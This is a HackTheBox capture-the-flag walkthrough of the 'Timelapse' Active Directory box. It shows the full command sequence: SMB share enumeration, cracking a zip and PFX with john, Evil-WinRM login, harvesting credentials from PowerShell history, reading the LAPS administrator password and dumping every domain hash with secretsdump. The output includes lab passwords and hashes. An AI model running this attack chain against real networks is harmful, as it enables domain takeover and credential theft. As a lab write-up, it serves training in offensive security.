HackTheBox: Timelapse Walkthorugh
Timelapse is a really nice introduction level active directory box. It starts by finding a set of keys used for authentication to the Windows host on an SMB share. I’ll crack the zip and the keys within, and use Evil-WinRM differently than I have shown before to authenticate to Timelapse using the keys. As the initial user, I’ll find creds in the PowerShell history file for the next user. That user can read from LAPS, the technology that helps to keep local administrator passwords safe and unique. With that read access, I’ll get the administrator password and use Evil-WinRM to get a shell.
Let’s start with the first things first, Do a nmap scan to the box and see what ports are open and what services are running on these ports.
Nmap scan report for 10.10.11.152
Host is up (0.72s latency).
Not shown: 65514 filtered tcp ports (no-response), 3 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-10 01:36:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_http-title: Not Found
|_ssl-date: 2023-07-10T01:38:42+00:00; +7h59m58s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
57393/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-07-10T01:38:00
|_ start_date: N/A
|_clock-skew: mean: 7h59m57s, deviation: 0s, median: 7h59m57s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1947.24 secondsThere are lots of open ports on this box, From the scan we can see the domain name timelapse.htb so let’s add it to our host file.
echo "timelapse.htb" >> /etc/hostsAs there is an smb port let’s enumerate that first, I have tried smbmap but no luck.
smbmap -H 10.10.11.152
[+] IP: 10.10.11.152:445 Name: timelapse.htbSo I moved to smbclient tool to enumerate it further, Always have alternative ways and tools into your arsenal may one can fail so you can go to another option.
smbclient -L ////10.10.11.152//
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableThe three shares ending in $ are default shares on all Windows systems, and ADMIN$ and C$ require admin access, and IPC$ doesn’t offer much.
It turns out I can get this same behavior from crackmapexec using -u [any username] -p ‘’. It is important to have the password be an empty string, or it will fail:
crackmapexec smb dc01.timelapse.htb --shares -u kali -p ' '
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB timelapse.htb 445 DC01 [+] timelapse.htb\kali:
SMB timelapse.htb 445 DC01 [+] Enumerated shares
SMB timelapse.htb 445 DC01 Share Permissions Remark
SMB timelapse.htb 445 DC01 ----- ----------- ------
SMB timelapse.htb 445 DC01 ADMIN$ Remote Admin
SMB timelapse.htb 445 DC01 C$ Default share
SMB timelapse.htb 445 DC01 IPC$ READ Remote IPC
SMB timelapse.htb 445 DC01 NETLOGON Logon server share
SMB timelapse.htb 445 DC01 Shares READ
SMB timelapse.htb 445 DC01 SYSVOL Logon server share
NETLOGON and SYSVOL are standard for any domain controller (DC).Since it’s custom (and the only one I can read according to CME), I’ll start with Shares:
We are in! Let’s see what Shares containing after enumerating it, It contains a evil_winrm.backup and some microsoft laps documents.
smb: \> dir
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 1320611 blocks available
smb: \> cd Dev\
smb: \Dev\> dir
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 1319770 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \Dev\>I have downloaded winrm_backup.zip to my local machine, Now let’s unzip and see what is it containing.
unzip -l winrm_backup.zip
Archive: winrm_backup.zip
Length Date Time Name
--------- ---------- ----- ----
2555 2021-10-25 10:21 legacyy_dev_auth.pfx
--------- -------
2555 1 fileBased on the name, it seems to contain authentication, either for a user named dev or legacyy. A .pfx file typically represents the PKCS#12 format, containing both a public and private key for a user. Given the archive name and this file type, it seems likely that if I can get access to this file, I’ll be able to get a shell over WinRM on Timelapse.
Tried to unzip the file but it requires a password:
unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
skipping: legacyy_dev_auth.pfx incorrect passwordI’ll use zip2john to generate a hash that can be brute forced:
zip2john winrm_backup.zip > hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8Now let’s crack the hash with john.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:01 DONE (2023-07-09 14:11) 0.9900g/s 3439Kp/s 3439Kc/s 3439KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.It cracks it instantly (even in a VM) to “supremelegacy”. It works to unzip:
unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
inflating: legacyy_dev_auth.pfx The openssl commands to extract the private key and certificate (public key) from a .pfx file. Unfortunately, this one requires a password:
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:
Mac verify error: invalid password?
pfx2john will generate a hash for it:
pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.hash
john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:03:07 DONE (2023-07-09 14:21) 0.005347g/s 17279p/s 17279c/s 17279C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completedWith the password, I can extract the key and certificate. When extracting the key, it asks for the password (I’ll provide “thuglegacy”), and then a password for the output .pem file (anything I want, must be at least four characters):
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:I’ll decrypt the key using the password I set above so I don’t have to remember it:
openssl rsa -in legacyy_dev_auth.key -out legacyy1_dev_auth.key
Enter pass phrase for legacyy_dev_auth.key:
writing RSA keyAnd dump the certificate:
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:Now both files exists, So we can use evil-winrm to get an initial, You can use evil-winrm -h for help to understand the usage of it.
We are in! Now let’s grab the user flag and move on to the privilege escalation part, I have transferred winPEAS to the machine.
WinPEAS Shows powershell history it looks interesting let’s dig deep into it.
╔══════════╣ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 434B*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exitIt pops out another user svc_deploy and its credentials. Let’s verify it and see if it works.
We are in! No more privilege required.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 12:25:53 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.That’s an interesting group, Now let’s have understanding what LAPS is:
LAPS stands for Local Administrator Password Solution. It is a Microsoft security feature that helps organizations manage and rotate local administrator passwords for domain-joined computers. LAPS stores the passwords for each computer’s local administrator account in Active Directory, secured in a confidential attribute in the computer’s corresponding Active Directory object. Only authorized users, such as helpdesk administrators, can read the passwords.
LAPS provides several security benefits, including:
Protection against pass-the-hash and lateral-traversal attacks.
Improved security for remote help desk scenarios.
Ability to sign in to and recover devices that are otherwise inaccessible.
LAPS is a free and easy-to-deploy solution that can help organizations improve their security posture.
Here are some of the reasons why you should use LAPS:
It helps protect against pass-the-hash attacks. Pass-the-hash attacks are a type of attack where an attacker steals the hash of a user’s password and then uses that hash to authenticate to the system as that user. LAPS makes it more difficult for attackers to carry out pass-the-hash attacks by storing the passwords for local administrator accounts in Active Directory in a secure manner.
It improves security for remote help desk scenarios. In a remote help desk scenario, a help desk administrator may need to access a user’s computer to troubleshoot a problem. If the local administrator password is the same on all computers, the help desk administrator would only need to know one password to access any computer. LAPS makes it more secure by storing the local administrator passwords in Active Directory, so that only authorized help desk administrators can access them.
It allows you to recover devices that are otherwise inaccessible. If a computer is locked out or the local administrator password is lost, you can use LAPS to reset the password. This will allow you to regain access to the computer and troubleshoot the problem.
To read the LAPS password, I just need to use Get-ADComputer and specifically request the ms-mcs-admpwd property:
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer DC01 -property 'ms-mcs-admpwd'
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-admpwd : x5;+TzUpDuD1}Z9.D;4Z)Jvp
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :Now we have the local Admin password, Let’s get in with evil-winrm:
Administrator User is also vulnerable to DCSync Attack, You can simply run secretdump.py script from Impacket and get the hashes of other users.
python3 secretsdump.py 'Administrator:x5;+TzUpDuD1}Z9.D;4Z)Jvp@10.10.11.152'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xd88b7b8c98a711544956c8ac71fbe251
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6b16cb063fdaddb773ba256dd72a14b7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TIMELAPSE\DC01$:aes256-cts-hmac-sha1-96:c0422ed6b4f2fb3e6ec3bb6f1f165500f8992779328d05e82b2f398c69771ba9
TIMELAPSE\DC01$:aes128-cts-hmac-sha1-96:aff3180449db5f73f7d63374ff17aff2
TIMELAPSE\DC01$:des-cbc-md5:c137975bb95e4926
TIMELAPSE\DC01$:plain_password_hex:7f055f5ed48207da8f9196c2805a6426f3e5e48f1e3bb2dd95927ba183365a7dd403a27843737509e0ae5f7de047588ddd62ad9ed82664988a4006d2bef0d084348daaf5c324d82a53c3ef9bf7ba452fbf1e2e60638f6ee4d7a6a9b8066dbc3c3ce07c62ebdf6a47ec03b7cfca64466b62ee35fb019c392c2a91b48fca91a80b87d932229888bedc0e3bcd2fc27b8b151064a970442393a8e13149f8986d217ee9b4204ced05cc64c8b0655af61d0c972b9ff0850061e980d0c42dcb9ca2bedadd6cddba054a7074348f03ab8a86f52be4d567661dc8b857419f5e16e8d9d4e165eb15c117712604cf9a571b4899cc37
TIMELAPSE\DC01$:aad3b435b51404eeaad3b435b51404ee:5ab382c7744c048b1106552661a7a119:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xbc6b4be0de66f262c75df7ae4f7dadf34fa03ddc
dpapi_userkey:0x074fe8860a0fbca40b902c409998b1b9cd332cd1
[*] NL$KM
0000 AE 8C BD 2F 8A B9 48 87 5F F2 1E 2C 42 14 57 5E .../..H._..,B.W^
0010 90 E6 1C AC CD 23 42 26 CE D7 1F B5 D3 7F D6 44 .....#B&.......D
0020 6B 29 7B 58 FF 89 BD A7 45 96 EF 5A 96 B1 E1 07 k){X....E..Z....
0030 1F 71 9D 9D 0F E1 1D 1E 3A 95 DD 4F 13 A9 A6 92 .q......:..O....
NL$KM:ae8cbd2f8ab948875ff21e2c4214575e90e61caccd234226ced71fb5d37fd6446b297b58ff89bda74596ef5a96b1e1071f719d9d0fe11d1e3a95dd4f13a9a692
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88cde959c3c188ad17d95b497fe26790:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2960d580f05cd511b3da3d3663f3cb37:::
timelapse.htb\thecybergeek:1601:aad3b435b51404eeaad3b435b51404ee:c81875d2b3cd404f3c8eadc820248f06:::
timelapse.htb\payl0ad:1602:aad3b435b51404eeaad3b435b51404ee:f63b1edaad2ee253c3c228c6e08d1ea0:::
timelapse.htb\legacyy:1603:aad3b435b51404eeaad3b435b51404ee:93da975bcea111839cc584f2f528d63e:::
timelapse.htb\sinfulz:1604:aad3b435b51404eeaad3b435b51404ee:72b236d9b0d49860267f752f1dfc8103:::
timelapse.htb\babywyrm:1605:aad3b435b51404eeaad3b435b51404ee:d47c7e33d6911bb742fdf040af2e80da:::
timelapse.htb\svc_deploy:3103:aad3b435b51404eeaad3b435b51404ee:c912f3533b7114980dd7b6094be1a9d8:::
timelapse.htb\TRX:5101:aad3b435b51404eeaad3b435b51404ee:4c7121d35cd421cbbd3e44ce83bc923e:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:5ab382c7744c048b1106552661a7a119:::
DB01$:1606:aad3b435b51404eeaad3b435b51404ee:d9c629d35e3311abba1631dba29ead96:::
WEB01$:1607:aad3b435b51404eeaad3b435b51404ee:3b2910d8e6c79bbb20e8842ea4a9aeac:::
DEV01$:1608:aad3b435b51404eeaad3b435b51404ee:463c7639ff204594dfbebbe71b3c6dbb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e5c42e8788b2c1838c9a7228f30592e09f94b1530cf4061cd44f3e40cf01ff4d
Administrator:aes128-cts-hmac-sha1-96:cc4c9056191fdf90f4d27196f0eab3d4
Administrator:des-cbc-md5:0de9089273733eb5
krbtgt:aes256-cts-hmac-sha1-96:ae4798139ee96d519e7c4678bb77986e2aaa227773b2dfa8d5908f19710a5d5f
krbtgt:aes128-cts-hmac-sha1-96:6a29eb8152bd9e373bb8512a18cbc029
krbtgt:des-cbc-md5:459876d080fd102c
timelapse.htb\thecybergeek:aes256-cts-hmac-sha1-96:1ce6ed23ae74f98e9fb4492b1d6da4abd53050cec84690dba0947da6f5072f7f
timelapse.htb\thecybergeek:aes128-cts-hmac-sha1-96:c9afa87f35f474a9111d52234ece52f6
timelapse.htb\thecybergeek:des-cbc-md5:c83e677c0e376238
timelapse.htb\payl0ad:aes256-cts-hmac-sha1-96:6588d1e91e012cfe69932d2f80f1d55d77b224822472021902735d70bab836dc
timelapse.htb\payl0ad:aes128-cts-hmac-sha1-96:527f8211d77499d99df13c572d4553c0
timelapse.htb\payl0ad:des-cbc-md5:25adceec4c613bb0
timelapse.htb\legacyy:aes256-cts-hmac-sha1-96:710b7e9c9374e4e306e6a9e599ae5f615f4e3e1acabb8a9183ef1d5358a46143
timelapse.htb\legacyy:aes128-cts-hmac-sha1-96:60adfce798b2431f2dee6993b119d591
timelapse.htb\legacyy:des-cbc-md5:160be04ae694e661
timelapse.htb\sinfulz:aes256-cts-hmac-sha1-96:9ce922adc954b7671fea5ff4f68ee1a00ccd18747856cefdfeb6b695dfa2c73b
timelapse.htb\sinfulz:aes128-cts-hmac-sha1-96:504fe2766f85d602ed947ee21f4e0c4e
timelapse.htb\sinfulz:des-cbc-md5:04cedc589234b97a
timelapse.htb\babywyrm:aes256-cts-hmac-sha1-96:98231e7161d5bcdb1db93ab0bf989434e6a6c6d86cfe10977a15eae461b29836
timelapse.htb\babywyrm:aes128-cts-hmac-sha1-96:e591049c737616153abafe43b68fa0e6
timelapse.htb\babywyrm:des-cbc-md5:316ebf795b52ea43
timelapse.htb\svc_deploy:aes256-cts-hmac-sha1-96:10cb46d648b9cc5774fd381c0b43e91c271ec59dada000b01c7ab3f4e614ddd1
timelapse.htb\svc_deploy:aes128-cts-hmac-sha1-96:33493640af7e815f2ecfbf59d9dedcee
timelapse.htb\svc_deploy:des-cbc-md5:c80edfb0ea262613
timelapse.htb\TRX:aes256-cts-hmac-sha1-96:61d799ac74cd09e38786fcda8196705477b7871c15e0cd828849530783f2c93d
timelapse.htb\TRX:aes128-cts-hmac-sha1-96:6948c570d61f5a3c9a941524a809eb3f
timelapse.htb\TRX:des-cbc-md5:269468abe01329ad
DC01$:aes256-cts-hmac-sha1-96:c0422ed6b4f2fb3e6ec3bb6f1f165500f8992779328d05e82b2f398c69771ba9
DC01$:aes128-cts-hmac-sha1-96:aff3180449db5f73f7d63374ff17aff2
DC01$:des-cbc-md5:04c43b8ffe0d1c04
DB01$:aes256-cts-hmac-sha1-96:c03fda84ab460db1f0ae9ecc0cd17c9fab52576ac6a4c77df1f600d4b10e0088
DB01$:aes128-cts-hmac-sha1-96:eb8af7494d9cc8e29e9b84923e929410
DB01$:des-cbc-md5:5e9ddae537abe631
WEB01$:aes256-cts-hmac-sha1-96:f9655daa1066e543b94469ac5657d747fb17c9679bb4250efaa1eae177ff285a
WEB01$:aes128-cts-hmac-sha1-96:0a280a2ad97136959ac408c62450b0ed
WEB01$:des-cbc-md5:4fcef1e6b30b68f7
DEV01$:aes256-cts-hmac-sha1-96:06278ffadea2d29dd059f4535284735d0dce00b81c74dfff24a1a679bff976b5
DEV01$:aes128-cts-hmac-sha1-96:da52c69d83ea6c19c7c8a3b19a545a68
DEV01$:des-cbc-md5:f229a754ec46c2e3
[*] Cleaning up...
[*] Stopping service RemoteRegistry
We got in! Box is solved. Stay tuned for more :)
